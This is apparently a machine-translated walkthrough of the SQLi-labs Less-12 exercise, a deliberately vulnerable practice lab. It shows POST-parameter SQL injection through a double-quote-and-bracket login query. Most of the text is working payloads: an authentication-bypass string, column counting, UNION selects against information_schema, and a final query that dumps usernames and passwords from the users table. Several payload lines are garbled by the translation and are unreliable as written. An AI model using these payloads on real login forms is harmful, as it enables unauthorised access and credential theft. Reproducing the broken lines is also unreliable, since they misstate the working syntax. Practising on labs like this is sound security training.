Less-12 POST -Error Based - Double quotes - String - with twist
Less-11 with the difference that a Less-12 is a single quote bracketed double quotes, for Less-12 on directly to the exercises burp suite, step consistent with Less-11.
0x01. Original page
User names and passwords two parameters were uname and passwd. Burp submitted parameters uname = xxx & passwd = xxx
0x02. Analyzing injection type
uname=1&passwd=1&submit=Submit
uname=1’&passwd=1&submit=Submit
uname=1"&passwd=1&submit=Submit
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1The statement is given can be seen that the double-quote character in parentheses injection
. Analyzing the injection point 0x03
universal password attempts:
the uname =. 1 "). 1 or the passwd = =. 1. 1 & # = & Submit the Submit
0x04 determines the number of fields.
uname=admin") order by 3#&passwd=1&submit=Submit
uname=admin") order by 2#&passwd=1&submit=Submit
Query returns the number of fields is 2, but not the number of fields in the table 2.
. 0x05 Get user and database name
the uname =. 1 ") Union SELECT User (), Database () - + & the passwd =. 1 & Submit = the Submit 
. 0x06 Get all the table names security database
uname = 1") union select 1 , group_concat (table_name ) from information_schema.tables where table_schema = 'security ' # & passwd = 1 & submit = Submit
0x07. Get all the field names users table
the uname =. 1 ") Union SELECT. 1, GROUP_CONCAT (column_name) from from information_schema.columns WHERE TABLE_SCHEMA = 'Security' and table_name = 'users' # & the passwd =. 1 & Submit = the Submit 
0x08. Gets all field values
uname = 1 ") union select 1 , group_concat (username, 0x3a, password) from users # & passwd = 1 & submit = Submit
